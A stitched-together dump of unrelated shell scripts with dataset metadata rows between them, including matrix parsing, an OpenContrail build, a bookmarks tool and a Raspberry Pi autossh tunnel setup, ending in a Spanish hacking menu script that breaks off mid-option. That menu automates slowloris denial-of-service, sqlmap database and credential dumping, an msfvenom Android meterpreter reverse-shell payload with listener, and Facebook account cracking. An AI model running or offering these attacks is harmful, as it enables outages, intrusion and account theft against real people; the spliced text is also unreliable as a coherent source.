rm "matrika1.dat"
fi
if [ -f "matrika2.dat" ]
then
rm "matrika2.dat"
fi
if [ $1 != "[" ] #ce ne zacnemo vnasati pravilno
then
echo "Napacen vnos!"
else
shift
for var in "$@" #preberemo vse znake in ko pridemo do prvega ] vemo da smo prebrali celotno 1 matriko
do
if [ $var == "]" ]
then
shift
break
fi
if [ $var == "," ] #ce je vejica skoci v novo vrstico
then
shift
echo >> matrika1.dat
#doda novo vrstico
else
printf "%0.2f" $var >> matrika1.dat
stevec1=$[$stevec1+1]
#zapise vrednost v datoteko
printf " " >> matrika1.dat
#vrednosti locimo s presledki
shift
fi
done
echo >> matrika1.dat
stolpci1=$(head -n 1 matrika1.dat | wc -w)
vrstice1=$(cat matrika1.dat | wc -l)
skupaj=$(($stolpci1 * $vrstice1)) #dobimo koliko je vrednosti v matriki1
if [ $skupaj -ne $stevec1 ] #st vrednosti v matriki1 se mora ujemati s stevcom, ki steje kolikokrat smo zapisali vrednost v mariko
then
echo "Vrtice in stolpci prve matrike se ne ujemajo!"
rm matrika1.dat #zbirsemo datoteko in zakljucimo izvajanje
exit 1
fi
stevec1=0
stolpci1=0
vrstice1=0
shift
for var in "$@" #preberemo vse znake in ko pridemo do prvega ] vemo da smo prebrali celotno 2 matriko
do
if [ $var == "]" ]
then
break
fi
if [ $var == "," ]
then
echo >> matrika2.dat
#doda novo vrstico
elif [ $var == "]" ]
then
echo
elif [ $var != "]" ]
then
printf "%0.2f" $var >> matrika2.dat
stevec1=$[$stevec1+1]
#zapise vrednost v datoteko
printf " " >> matrika2.dat
#vrednosti locimo s presledki
fi
done
echo >> matrika2.dat
stolpci1=$(head -n 1 matrika2.dat | wc -w)
vrstice1=$(cat matrika2.dat | wc -l)
skupaj=$(($stolpci1 * $vrstice1)) #dobimo koliko je vrednosti v matriki2
if [ $skupaj -ne $stevec1 ] #st vrednosti v matriki2 se mora ujemati s stevcom, ki steje kolikokrat smo zapisali vrednost v mariko
then
echo "Vrtice in stolpci druge matrike se ne ujemajo!"
rm matrika1.dat
rm matrika2.dat #zbirsemo obe datoteki in zakljucimo izvajanje
exit 1
fi
fi
| true
|
0c575cb8cf062e6de0ad1ccff7914c835882ef2f
|
Shell
|
simonjohngreen/dc-open-contrail-buildandtest
|
/scripts/build2.sh
|
UTF-8
| 2,245
| 3.0625
| 3
|
[] |
no_license
|
echo Executing build2.sh
echo cloning the opencontrail git repo and building the products
# we need the keypairs file for the git user and login so test for it
if [ ! -f /home/vagrant/keypairs ]; then
echo "Keypairs file is missing but required by build2.sh!"
exit 1
fi
# extract variables from the keypairs file
source /home/vagrant/keypairs
# contrail build directory
#su - vagrant -c 'mkdir -p /home/vagrant/contrail'
## create new ssh key (no passphrase)
#su - vagrant -c 'ssh-keygen -f .ssh/id_rsa -P ""'
#eval `ssh-agent`
#ssh-add
##add the git repo
su - vagrant -c 'git config --global user.name $gituser'
su - vagrant -c 'git config --global user.email $gitemail'
cd /home/vagrant/contrail
su - vagrant -c 'cd /home/vagrant/contrail; ssh -o "StrictHostKeyChecking no" git@github.com'
su - vagrant -c 'cd /home/vagrant/contrail; git config --global color.ui true'
su - vagrant -c 'cd /home/vagrant/contrail; repo init -u git@github.com:Juniper/contrail-vnc'
su - vagrant -c 'cd /home/vagrant/contrail; repo sync'
sudo python /home/vagrant/contrail/third_party/fetch_packages.py
sudo python /home/vagrant/contrail/contrail-webui-third-party/fetch_packages.py
echo "# removing DPDK from the build as its not working yet"
#su - vagrant -c 'cp /home/vagrant/contrail/packages.make /home/vagrant/original-packages.make'
#su - vagrant -c "sed 's/contrail-heat \\\\/contrail-heat/' < /home/vagrant/contrail/packages.make | sed '/\\\$(CONTRAIL_VROUTER_DPDK)/d' > /home/vagrant/contrail/temp.make"
#su - vagrant -c 'cd /home/vagrant/contrail; cp -f /home/vagrant/contrail/temp.make /home/vagrant/contrail/packages.make'
su - vagrant -c 'cp /home/vagrant/contrail/packages.make /home/vagrant/original-packages.make'
su - vagrant -c "sed '/DPDK vRouter/,+6 d' < /home/vagrant/contrail/packages.make > /home/vagrant/contrail/temp.make"
su - vagrant -c 'cd /home/vagrant/contrail; cp -f /home/vagrant/contrail/temp.make /home/vagrant/contrail/packages.make'
echo making the opencontrail packages this may take a while
#make the packages, takes a while
#sudo make -f /home/vagrant/contrail/packages.make $makeopts 2>&1 | tee /home/vagrant/contrail/build.log
cd /home/vagrant/contrail
make -f /home/vagrant/contrail/packages.make $makeopts
| true
|
b941091214c2deb6c53438a58e41b7eac7029629
|
Shell
|
maxproft/thesis
|
/cgle/bulkcgle
|
UTF-8
| 420
| 3.46875
| 3
|
[] |
no_license
|
#!/bin/bash
echo -e "\nMaking Subfolder and Data for CPUs"
subfolder='folder'
python bulk_setup.py $subfolder
echo -e "\n "
#Total number of cpus
cpucores=$(grep -c ^processor /proc/cpuinfo 2>/dev/null || sysctl -n hw.ncpu)
#1 fewer than the number of cpus
CPUsMinus="$(($cpucores-1))"
for cpuid in $(seq 0 $CPUsMinus)
#The default python version is used
do python bulk_run.py $subfolder $cpuid &
done
| true
|
223ac33025436672fdecffccc4fc600efc9dc458
|
Shell
|
krebs/painload
|
/retiolum/scripts/adv_graphgen/scripts/all-the-graphs
|
UTF-8
| 603
| 3
| 3
|
[
"WTFPL"
] |
permissive
|
#!/bin/bash
EXTERNAL_FOLDER=${EXTERNAL_FOLDER:-/var/www/euer.krebsco.de/graphs/retiolum}
INTERNAL_FOLDER=${INTERNAL_FOLDER:-/var/www/euer/graphs/retiolum}
export GEODB="${GEODB:-}"
export TINC_HOSTPATH=${TINC_HOSTPATH:-~/painload/retiolum/hosts}
mapfile="$INTERNAL_FOLDER/map.html"
if test -n "$GEODB";then
if test ! -e "$mapfile";then
echo "copying map to $map.html"
copy-map "$mapfile"
fi
echo "creating geodata database"
tinc-stats2json | add-geodata > "$INTERNAL_FOLDER/marker.json"
fi
build-graphs anonymous "$EXTERNAL_FOLDER"
build-graphs complete "$INTERNAL_FOLDER"
| true
|
59e3d0248e4f46872da460275ed7febaec95d723
|
Shell
|
tro3373/dotfiles
|
/bin/vb
|
UTF-8
| 118
| 2.640625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
readonly DOT_BIN=${DOTPATH:-$HOME/.dot}/bin
main() {
cd $DOT_BIN
$DOT_BIN/v "$@"
}
main "$@"
| true
|
857c189c49c486e8725546aad6ec9a1ff71d1965
|
Shell
|
toniz4/bookmarksman
|
/bookmarksman
|
UTF-8
| 2,266
| 3.890625
| 4
|
[
"0BSD"
] |
permissive
|
#!/bin/sh
# See LICENSE for license details.
VERSION="0.1"
bookdir="${XDG_DATA_HOME:-$HOME/.local/share}/bookmarks"
bookmarks="$bookdir/bookmarks.json"
tmpbookmarks="$(mktemp)"
die () {
exit 1
}
openbookmark () {
selectsection="$(jq -r 'keys[]' "$bookmarks"\
| dmenu -w "$winid" -p "Open witch section?")" || die
selecttitle="$(jq -r ".$selectsection | keys[]" "$bookmarks" |\
dmenu -w "$winid" -p "Select bookmark")" || die
link="$(jq -r ".${selectsection}.\"${selecttitle}\"" "$bookmarks")"
[ -n "$link" ] && echo "$link"
}
deletebookmark() {
selectsection="$(jq -r 'keys[]' "$bookmarks"\
| dmenu -w "$winid" -p "Open witch section?")" || die
selecttitle="$(jq -r ".$selectsection | keys[]" "$bookmarks" |\
dmenu -w "$winid" -p "Select bookmark to delete")" || die
delete=$(printf "Yes\\nNo" | \
dmenu -w "$winid" -i -p "Are you sure you want to delete $selecttitle?")
case "$delete" in
Yes) jq "del(.$selectsection.\"$selecttitle\")" "$tmpbookmarks" > "$bookmarks";;
*) die;;
esac
rm "$tmpbookmarks"
}
substitutebookmark() {
substitute=$(printf "Yes\\nNo" | \
dmenu -w "$winid" -i -p "There is a bookmark with that name, substitute it?")
case "$substitute" in
Yes) jq "del(.$section.\"$title\")" "$tmpbookmarks" > "$bookmarks";;
*) die;;
esac
}
newbookmark() {
title="$(printf "" | dmenu -w "$winid" -p "Save bookmas as:")" || die
title="$(printf "$title" | sed 's/"//g')"
section="$(jq -r 'keys[]' "$bookmarks" | dmenu -w "$winid" -p "Witch section?")" || die
cp -r "$bookmarks" "$tmpbookmarks"
bookmarkexist="$(jq -r ".${section}.${title}" "$bookmarks")"
[ "$bookmarkexist" = "null" ] || [ -z "$bookmarkexist" ]\
|| substitutebookmark "$section" "$title"
jq "."$section" += {\"$title\": \"$url\"}" "$tmpbookmarks" > "$bookmarks"
rm "$tmpbookmarks"
}
initbookmarks() {
[ -d "$bookdir" ] || mkdir -p "$bookdir"
printf "{\n}\n" > "$bookmarks"
}
help() {
cat <<EOF
usage: bookmarksman [-v] [open] [del] [add [URL]] [XID]
EOF
die
}
[ -e "$bookmarks" ] || initbookmarks
case "$1" in
open)
winid="${2:-0x0}"
openbookmark
;;
add)
url="$2"
winid="${3:-0x0}"
newbookmark
;;
del)
winid="${2:-0x0}"
deletebookmark
;;
-v)
echo "$VERSION"
exit
;;
*) help
;;
esac
| true
|
6d1c4d59fce699bee523b100188ecff5b1e80fd6
|
Shell
|
PrairieOps/mtf-image-edit
|
/boot/onboot.sh
|
UTF-8
| 2,913
| 3.59375
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
read -r -d '' \
MTFAUTOSSHSVC <<- EOF
[Unit]
Description=SSH tunnel to mtf_ssh host
After=network.target
[Service]
User=pi
ExecStart=/bin/bash /opt/mtf/bin/autossh.sh
RestartSec=5
Restart=always
[Install]
WantedBy=multi-user.target
EOF
if [ -d /boot/mtf ]
then
# Get MAC address
mac=$(ip -br link show dev wlan0 | tr -s ' ' | cut -d ' ' -f 3)
# Set hostname based on mac
hostname="lib-mtf-$(printf %s "${mac}" | cut -d ':' -f 4,5,6 --output-delimiter=)"
read -r -d '' \
HOSTS <<- EOF
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.1.1 ${hostname}
EOF
echo "$HOSTS"| tee "/etc/hosts" >/dev/null
echo "$hostname"| tee "/etc/hostname" >/dev/null
hostname "${hostname}"
if [ -f /boot/mtf/id_rsa.pub ] && [ -f /boot/mtf/id_rsa ]
then
mkdir -p /home/pi/.ssh
cp /boot/mtf/id_rsa /home/pi/.ssh/
cp /boot/mtf/id_rsa.pub /home/pi/.ssh/
cp /boot/mtf/id_rsa.pub /home/pi/.ssh/authorized_keys
chmod 600 /home/pi/.ssh/*
chmod 700 /home/pi/.ssh
chown -R 1000:1000 /home/pi/.ssh
fi
if [ -f /boot/mtf/ssh_server ] && [ -f /boot/mtf/autossh.sh ]
then
# get the server network name/ip
mtf_ssh_server=$(head -n 1 /boot/mtf/ssh_server)
# set the port based on the last two digits in the mac address
ssh_tunnel_port=52"$(printf %s "${mac}" | grep -o "[0-9]" | tr -d '\n'| tail -c 3)"
web_tunnel_port=58"$(printf %s "${mac}" | grep -o "[0-9]" | tr -d '\n'| tail -c 3)"
# write the ssh config for seamless connections to mtf_ssh_server
read -r -d '' \
MTFSSHCONFIG <<- EOF
Host mtf_ssh_tunnel
HostName ${mtf_ssh_server}
User pi
IdentityFile ~/.ssh/id_rsa
RemoteForward ${ssh_tunnel_port} 127.0.0.1:22
RemoteForward ${web_tunnel_port} 127.0.0.1:80
StrictHostKeyChecking no
ExitOnForwardFailure yes
ServerAliveInterval 60
ServerAliveCountMax 3
Host mtf_ssh_server
HostName ${mtf_ssh_server}
User pi
IdentityFile ~/.ssh/id_rsa
StrictHostKeyChecking no
EOF
# apply local ssh config
echo "$MTFSSHCONFIG"| tee "/home/pi/.ssh/config" >/dev/null
chown 1000:1000 /home/pi/.ssh/config
# Move exec wrapper script for service
mv /boot/mtf/autossh.sh /opt/mtf/bin/
# Move plugd action for auto ssh service
mv /boot/mtf/autossh.plugd /etc/ifplugd/action.d/autossh
# Write service template
echo "$MTFAUTOSSHSVC"| tee "/etc/systemd/system/autossh.service" >/dev/null
ln -s /etc/systemd/system/autossh.service /etc/systemd/system/multi-user.target.wants/autossh.service
systemctl start autossh.service &
fi
# Set Wifi to auto reconnect if we have the script to do it
if [ -f /etc/wpa_supplicant/ifupdown.sh ]
then
ln -s /etc/wpa_supplicant/ifupdown.sh /etc/ifplugd/action.d/ifupdown
fi
fi
| true
|
06abbfaaf30d4a32c6f2280dce597f9989be8593
|
Shell
|
ffirg/openshift
|
/bin/create-ose3-app-ab-deployment.sh
|
UTF-8
| 3,177
| 3.4375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
export APPNAME="ab-demo-app"
APPv1="version=1"
APPv2="version=2"
DEMO_USER="developer"
PROJECT="abdeployment"
SRC="https://github.com/ffirg/ab-deploy.git"
NAME="abdeploy.192.168.99.100.xip.io"
LABELS="versioning=true"
build_status="NULL"
pods=4
# include all our functions...
. ../libs/functions
# START
echo
echo "EXAMPLE OPENSHIFT v3 APP A-B ROLLING DEPLOYMENT"
echo "*** BEFORE STARTING ENSURE APP IS VERSION ONE on $SRC ***"
echo
run_cmd echo "First login into OSE (as $DEMO_USER user)..."
run_cmd run "oc login -u $DEMO_USER"
# setup project
run_cmd echo "Setup the $PROJECT project"
run_cmd run "oc new-project $PROJECT --description \"Rolling A-B Deployment Example\""
run_cmd run "oc project $PROJECT"
# do some dev work!
run_cmd echo "Create new app - let's call it \"$APPNAME\""
run_cmd run "oc new-app $SRC --name=${APPNAME} --labels=$APPv1"
# wait until the build is finished before going on...
check_build ${APPNAME}
run_cmd echo "Let's expose a route for the new service:"
VERSION="v1"
run_cmd run "oc expose service ${APPNAME} --name=${APPNAME}-${VERSION}"
run_cmd echo "Let's now scale up the service, to cope with more incoming load..."
oc scale dc/${APPNAME} --replicas=$pods
run_cmd echo "We should now have $pods pods running..."
run_cmd run "oc get pods"
run_cmd echo "We can check what we're hitting with a simple curl test:"
for i in {1..10}; do curl `oc get route|grep "${APPNAME}-${VERSION}"|awk '{print $2}'`; echo " "; done
# Make change to source code...
echo
run_cmd echo "GO MAKE A CHANGE TO THE SOURCE CODE @ ${SRC} and change VERSION 1 to VERSION 2 in index.php"
#run_cmd echo "Create a new version of our app..."
VERSION="v2"
run_cmd run "oc new-app $SRC --name=${APPNAME}-${VERSION} --labels=$APPv2"
# wait until the build is finished before going on...
check_build ${APPNAME}-${VERSION}
run_cmd echo "Check again the number of pods running..."
run_cmd run "oc get pods"
run_cmd echo "Let's expose a second route for the new version:"
#run_cmd run "oc expose service ${APPNAME}-v2 --name=${APPNAME}-v2 --hostname=v2.${NAME}"
run_cmd run "oc expose service ${APPNAME}-${VERSION} --name=${APPNAME}-${VERSION}"
run_cmd echo "and do the curl test again:"
#for i in {1..10}; do curl v2.${NAME}; echo " "; done
for i in {1..10}; do curl `oc get route|grep "${APPNAME}-${VERSION}"|awk '{print $2}'`; echo " "; done
run_cmd echo "Now let's scale down $APPv1 and $APPv2 up..."
run_cmd run "oc scale dc/${APPNAME} --replicas=2"
run_cmd run "oc scale dc/${APPNAME}-v2 --replicas=2"
run_cmd echo "The curl test again:"
#for i in {1..10}; do curl v1.${NAME}; echo " "; done
#for i in {1..10}; do curl v2.${NAME}; echo " "; done
for i in {1..10}; do curl `oc get route|grep "${APPNAME}"|awk '{print $2}'`; echo " "; done
run_cmd echo "Version 2 looks great, so let's rolls that out and retire version 1..."
run_cmd run "oc scale dc/${APPNAME} --replicas=0"
run_cmd run "oc scale dc/${APPNAME}-v2 --replicas=4"
run_cmd echo "We're now running only VERSION 2:"
#for i in {1..10}; do curl v2.${NAME}; echo " "; done
for i in {1..10}; do curl `oc get route|grep "${APPNAME}"|awk '{print $2}'`; echo " "; done
# THE END
| true
|
872ba2e8ea8d540cc968e9c517b93177412049dc
|
Shell
|
waggle-sensor/wagman
|
/boards/v4/firmware/regular_mode/firmware/flash-wagman
|
UTF-8
| 421
| 2.890625
| 3
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
#!/bin/bash
# This file is part of the Waggle Platform. Please see the file
# LICENSE.waggle.txt for the legal details of the copyright and software
# license. For more details on the Waggle project, visit:
# http://www.wa8.gl
firmware=$1
port=$2
if [ -z "$firmware" ] || [ -z "$port" ]; then
echo "usage: $0 firmware port"
exit 1
fi
bossac -i -d --port=$(basename $port) -U true -e -w -v -b $firmware -R
| true
|
4b361db18019f0ad9bdb50394cdf49cb2b3b1361
|
Shell
|
hanulhan/LinuxScript
|
/StopPhilipsLogging.sh
|
UTF-8
| 817
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
CONFIG_FILE="/home/uli/Logging/Philips_putty_pid"
#Read LogFileName
#read -p "Filename: " LogFileName
#Read the config file
echo "Reading config..." >&2
if [ ! -f $CONFIG_FILE ]; then
echo "File $CONFIG_FILE not found!"
fi
source $CONFIG_FILE &>/dev/null
#echo $?
echo "Config for pidPutty: $pidPutty" >&2
echo "Config for pidXterm: $pidXterm" >&2
echo "Config for pidFormat: $pidFormat" >&2
#Stop putty
echo "sudo kill $pidPutty"
sudo kill $pidPutty
echo "sudo kill $pidXterm"
sudo kill $pidXterm
echo "sudo kill $pidFormat"
sudo kill $pidFormat
#mv /home/uli/Logging/Philips.log /home/uli/Logging/${LogFileName}.log
#mv /home/uli/Logging/Philips_format.log /home/uli/Logging/${LogFileName}-format.log
#chown uli:uli /home/uli/Logging/${LogFileName}*
#chmod 775 /home/uli/Logging/${LogFileName}*
| true
|
4f6f42ff6c2047a6e79e46e4d563f7c00b8fe1d4
|
Shell
|
YungSang/vagrant-docker-review
|
/contrib/review
|
UTF-8
| 1,342
| 3.890625
| 4
|
[] |
no_license
|
#!/bin/sh
print_usage() {
echo "Usage: $(basename $0) <command> [<arguments...>]"
echo
echo "command:"
echo " catalog-converter | review-catalog-converter"
echo " check | review-check"
echo " checkdep | review-checkdep"
echo " compile | review-compile"
echo " epubmaker | review-epubmaker"
echo " epubmaker-legacy | review-epubmaker-legacy"
echo " index | review-index"
echo " init | review-init"
echo " pdfmaker | review-pdfmaker"
echo " preproc | review-preproc"
echo " validate | review-validate"
echo " vol | review-vol"
echo
echo " bash (or other linux commands)"
}
CMD="$1"
if [ -z "$CMD" ] ; then
print_usage >&2
exit 1
fi
shift
case "$CMD" in
"catalog-converter" | "check" | "checkdep" | "compile" | "epubmaker" | "epubmaker-legacy" | "index" | "init" | "pdfmaker" | "preproc" | "validate" | "vol" ) CMD="review-${CMD}";;
esac
DIR=`pwd | sed -e "s/^.*\(\/review-projects\/.*\)\$/\1/"`
if [[ "$DIR" == /review-projects/* ]]; then
docker run -it --rm -v /vagrant/review-projects:/review-projects yungsang/review \
sh -c "cd $DIR && $CMD $*"
else
echo "$(basename $0) must be executed under the review-projects folder." >&2
echo >&2
print_usage >&2
exit 3
fi
| true
|
a2f6f6934a3cb4c189a09f3816be54a216a276d9
|
Shell
|
mikeyhu/GoRSS
|
/server/ops/test-stop.sh
|
UTF-8
| 152
| 2.9375
| 3
|
[] |
no_license
|
#!/bin/bash
echo "Stopping test mongo"
pidfile="test/resources/database.pid"
if [ -f $pidfile ]
then
PID=`cat ${pidfile}`
rm $pidfile
kill $PID
fi
| true
|
9b1fc360128fd26a79d36f3c3854b41f84963e8a
|
Shell
|
mariosbikos/ceid-projects
|
/opsys12b/run_tests.sh
|
UTF-8
| 963
| 4
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
usage(){
cat << EOF
Usage: $0 [OPTIONS] {amount of clients}
OPTIONS
-a grep output for how many cokes were given
-b grep output for how many clients got colas
-v grep output for verbose representation of colas distribution on clients
NOTE
For easy monitoring of the server process
watch -n 0.1 "ps -eLf|grep ' server'"
EXAMPLE
./run_tests.sh -abv 100
EOF
}
clients(){
for i in `seq 1 $1`
do
./client 1 &
done
wait $(jobs -p)
}
#if argument is not supplied, call usage
[[ $# -eq 0 ]] && usage
#if one argument is supplied without options
if [[ $# -eq 1 ]]; then
clients ${@: -1}
else
output=$(clients ${@: -1});
while getopts :abv opt; do
case $opt in
a) echo -n 'Coca colas given: ';
echo "$output"|grep cola|wc -l ;;
b) echo -n 'Clients that got colas: ';
echo "$output"|grep cola|uniq -c|wc -l ;;
v) echo "$output"|grep cola|uniq -c ;;
\?) Invalid option -$OPTARG >&2 ;;
esac
done
fi
| true
|
27125cd79187c3808e04aef3be3cf6a9bc8e1706
|
Shell
|
ualsg/global-building-morphology-indicators
|
/query_templates/c1-gbmi/end_to_end_database.sh
|
UTF-8
| 1,327
| 3.21875
| 3
|
[
"CC-BY-4.0"
] |
permissive
|
#!/bin/bash
database="{{ database }}"
declare -a raster_names=('worldpop2020_1km' 'worldpop2020_100m')
declare -a commands=(\
"bash ./db_setup_${database}.sh" \
"bash ./osm_gadm_tables_${database}.sh")
for cmd in "${commands[@]}"; do
echo "\n ${cmd}"
eval "$cmd"
done
for raster_name in "${raster_names[@]}"; do
# Compute neighbour table, neighbour indicators within buffer
declare -a commands=(\
"bash ./raster_tables_by_${raster_name}_${database}.sh" \
"bash ./base_tables_by_${raster_name}_${database}.sh" \`
"bash ./geoms_tables_by_${raster_name}_${database}.sh" \
"bash ./neighbours_tables_by_${raster_name}_${database}.sh" \
"bash ./neighbours_tables_by_${raster_name}_centroid_${database}.sh" \
"bash ./final_tables_by_${raster_name}_${database}.sh" \
"bash ./final_tables_by_${raster_name}_centroid_${database}.sh" \
"bash ./export_${raster_name}_${database}.sh" \
"bash ./export_tiff_${raster_name}_${database}.sh")
if [[ "${database}" == "planet" || "${database}" == "argentina" || "${database}" == "new_zealand" || "${database}" == "switzerland" ]] && [[ "${raster_name}" == "worldpop2020_100m" ]]; then
echo "Skipping ${raster_name} for ${database}."
else
for cmd in "${commands[@]}"; do
echo "$cmd"
eval "$cmd"
done
fi
done
| true
|
d5e908274f5b8b39c99d0a9165fc247ebc779bf4
|
Shell
|
anonymous-sys19/Hacktoolpc
|
/hacktoolpc.sh
|
UTF-8
| 9,525
| 2.75
| 3
|
[] |
no_license
|
#!/bin/bash
#Politica y Privicidad »»»» HACKER-PC
echo -e "----> ESTE SCRIPT ESTA EN DESARROLLO PRONTO AGREGARE UN MENU <----"
sleep 3
clear
function limpiar_pantalla {
clear
}
limpiar_pantalla
while :
do
opcion=0
echo
echo
echo -e " \e[0;34m ::: ::: ::: :::::::: ::: :::::::::::::::::::::: ::::::::: :::::::: \e[0m"
echo -e " \e[0;34m :+: :+: :+: :+: :+: :+::+: :+: :+: :+: :+: :+: :+::+: :+: \e[0m"
echo -e " \e[0;34m +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:++:+ \e[0m"
echo -e " \e[0;34m +#++:++#+++#++:++#++:+#+ +#++:++ +#++:++# +#++:++#: +#++:++#++:+++#++:++#+ +#+ \e[0m"
echo -e " \e[0;34m +#+ +#++#+ +#++#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ \e[0m"
echo -e " \e[0;34m #+# #+##+# #+##+# #+##+# #+# #+# #+# #+# #+# #+# #+# \e[0m"
echo -e " \e[0;34m### ###### ### ######## ### ################ ### ### ######## \e[0m"
echo
echo
echo -e " \e[0;34m 01 \e[31mNmap\e[0;34m" " Simple comando NMAP "
echo -e " \e[0;34m 02 \e[31mSqlmap\e[0;34m" " SQLmap automatizado con todos los comandos puede demmorar el scan ... "
echo -e " \e[0;34m 03 \e[31mDdoS-slowloris.pl\e[0;34m" " Pre instalado el original slowloris y pre configurado para un ataque mas potente ... "
echo -e " \e[0;34m 04 \e[31mPayload-android\e[0;34m" " Un solo PAYLOAD automatizado y te dejara msfconsole en modo escucha ... "
echo -e " \e[0;34m 05 \e[31mXSSTRIKE\e[0;34m" " XSStrike un potente scan de vulnerabilidades xss el mas completo ... "
echo -e " \e[0;34m 06 \e[31mGross-fb\e[0;34m" " Un script que te ayudara a Crackear cuentas de facebook servible hasta hoy ... "
echo -e " \e[0;34m 07 \e[31mGOOD-KILLER\e[0;34m" " Script good-killer herramienta que envia sms-spam 1 SmS por dia ... "
echo -e " \e[0;34m 08 \e[31mZphisher\e[0;34m" " zphisher script profecional para phishing ... "
echo -e " \e[0;34m 09 \e[31mAIOPhish\e[0;34m" " aiophish un completo script para phishing ... "
echo -e " \e[0;34m 10 \e[31mmas herramientasde hacking\e[0;34m" "Es un listado de mas herramientas alojadas esta nueva actualizacion"
echo -e " \e[0;34m 99 \e[31m\e[5mSalir\n\e[25m"
echo -e -n "\e[32m Ingrese un valor :> "
read opcion
case $opcion in
1)
function limpiar_pantalla {
clear
}
trap ctrl_c INT
function ctrl_c() {
echo -e "\e[0;31m SALIENDO DEL SCRIPT\e[0m"
sleep 2s
limpiar_pantalla
exit 0
}
nmap
echo "Este proseso podria tardar por el escaneo ..."
read -p "INGRESE SU IP O PAGINA WEB > " v
sudo nmap --top-ports 25 $v/24
read enterkey
;;
2)
function limpiar_pantalla {
clear
}
trap ctrl_c INT
function ctrl_c() {
echo -e "\e[0;31m SALIENDO DEL SCRIPT\e[0m"
sleep 2s
limpiar_pantalla
exit 0
echo "volviendo al menu "
bash Hacker-pc.sh
}
sqlmap
echo -e "secuencia sqlmap\n"
echo
read -p "Citio web, IP > " o
sudo sqlmap -u "$o" --random-agent --current-db --level=5 --dbms=Mysql
echo
read -p "Enter dbs > " s
sudo sqlmap -u $o --random-agent --level=5 --dbms=Mysql -D $s --tables
echo
read -p "your user > " e
sudo sqlmap -u $o --random-agent --level=5 --dbms=Mysql -D $s -T $e --columns
echo
read -p "el pass y id dela pagina > " pass usr
sudo sqlmap -u $o --random-agent --level=5 --dbms=Mysql -D $s -T $e -C $pass,$usr --dump
read enterkey
;;
3)
function limpiar_pantalla {
clear
}
trap ctrl_c INT
function ctrl_c() {
echo -e "\e[0;31m SALIENDO DEL SCRIPT\e[0m"
sleep 2s
limpiar_pantalla
exit 0
bash Hacker-pc.sh
echo "volviendo al menu "
}
for slowloris in output
do
cd output
limpiar_pantalla
git clone https://github.com/Ogglas/Orignal-Slowloris-HTTP-DoS.git
limpiar_pantalla
chmod 777 -R Orignal-Slowloris-HTTP-DoS
cd Orignal-Slowloris-HTTP-DoS
perl slowloris.pl
echo -e " \e[0;34m\e[5mCrack ingresa la URL a atacar\e[25m"
read url
echo -e " \e[0;34m\e[5mPuerto\e[25m"
read p
echo -e " \e[0;34m\e[5mTimeout\e[25m"
read t
limpiar_pantalla
echo -e " \e[0;34m\e[5mCAGANDONOS EN LA PUTA MADRE CRACK\e[25m "
sleep 3
perl slowloris.pl -dns $url -port $p -timeout -num $t -cache
done
read enterkey
;;
4)
function limpiar_pantalla {
clear
}
trap ctrl_c INT
function ctrl_c() {
echo -e "\e[0;31m SALIENDO DEL SCRIPT\e[0m"
sleep 2s
limpiar_pantalla
exit 0
echo "volviendo al menu "
bash Hacker-pc.sh
}
echo -e "\e[0;31m___________________________\e[0;34m___________________________________\e[0m"
echo -e "\e[0;31m ██╗ ██╗ █████╗ ██████╗ \e[0;34m ██╗ ██ ║ ███████╗ ██████╗ \e[0m"
echo -e "\e[0;31m ██║ ██║ ██╔══██╗ ██╔════╝\e[0;34m ██║ ██╔╝ ██╔════╝ ██╔══██╗ \e[0m"
echo -e "\e[0;31m ███████║ ███████║ ██║Anoni\e[0;34mmo█████╔╝ █████╗ ██████╔╝ \e[0m"
echo -e "\e[0;31m ██╔══██║ ██╔══██║ ██║ \e[0;34m ██╔═██╗ ██╔══╝ ██╔══██╗ \e[0m"
echo -e "\e[0;31m ██║ ██║ ██║ ██║╚██████╗ \e[0;34m ██║ ██╗ ███████╗ ██║ ██║ \e[0m"
echo -e "\e[0;31m ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ \e[0;34m ╚═╝ ╚═╝ ╚══════╝ ╚═ ╚═╝ \e[0m"
echo -e "\e[0;31m \e[0;34m \e[0m"
echo -e "\e[0;31m A n o\e[0;34m n i m o \e[0m"
echo -e "\e[3;34mDERECHOS-DE-AUTOR->>>\e[0;31mHACKER-PC\e[0m"
sleep 2s
echo -e "\e[1;31mVAMOS-A-CREAR-UN-PAYLOAD-ANDROID ... \e[0m"
sleep 3s
echo -n -e "\e[0;31mDIRECCION-IP\e[0m"
read ip
echo -n -e "\e[0;31mPUERTO\e[0m"
read puerto
read -p "\e[0;31mNombre de la aplicacion :" o
limpiar_pantalla
echo -e "\e[3;33mcreando aplicacion \e[0m"
msfvenom -p android/meterpreter/reverse_tcp lhost=$ip lport=$puerto R > $o.apk
echo -e "\e[1;33mCreado con-\e[0m-\e[0;31m-EXITO\e[0m"
sleep 2s
echo -e "\e[0;34mConectando a postgresql\e[0m"
sudo service postgresql start
echo -e "\e[0;34mConectado con exito\e[0m"
sleep 2s
echo -e "\e[0;31mABRIENDO METASPLOIT\e[0m"
sleep 2s
limpiar_pantalla
msfconsole -x "use multi/handler;\
set PAYLOAD android/meterpreter/reverse_tcp;\
set LHOST $ip;\
set LPORT $puerto;\
exploit"
read enterkey
;;
5)
function limpiar {
clear
}
trap ctrl_c INT
function ctrl_c() {
echo -e "\e[0;31m SALIENDO DEL SCRIPT\e[0m"
sleep 2s
limpiar_pantalla
exit 0
echo "volviendo al menu "
bash Hacker-pc.sh
}
for XSStrike in output
do
function limpiar_pantalla {
clear
}
cd output
limpiar_pantalla
git clone https://github.com/s0md3v/XSStrike.git
chmod 777 -R XSStrike
limpiar_pantalla
cd XSStrike
python3 xsstrike.py
echo -e "comandos a agregar para el escaneo " URL
read url
python3 xsstrike.py $URL
done
read enterkey
;;
6)
trap ctrl_c INT
function ctrl_c() {
echo -e "\e[0;31m SALIENDO DEL SCRIPT\e[0m"
sleep 2s
limpiar_pantalla
exit 0
echo "volviendo al menu "
}
for Grossfb in output
do
function limpiar_pantalla {
clear
}
cd output
limpiar_pantalla
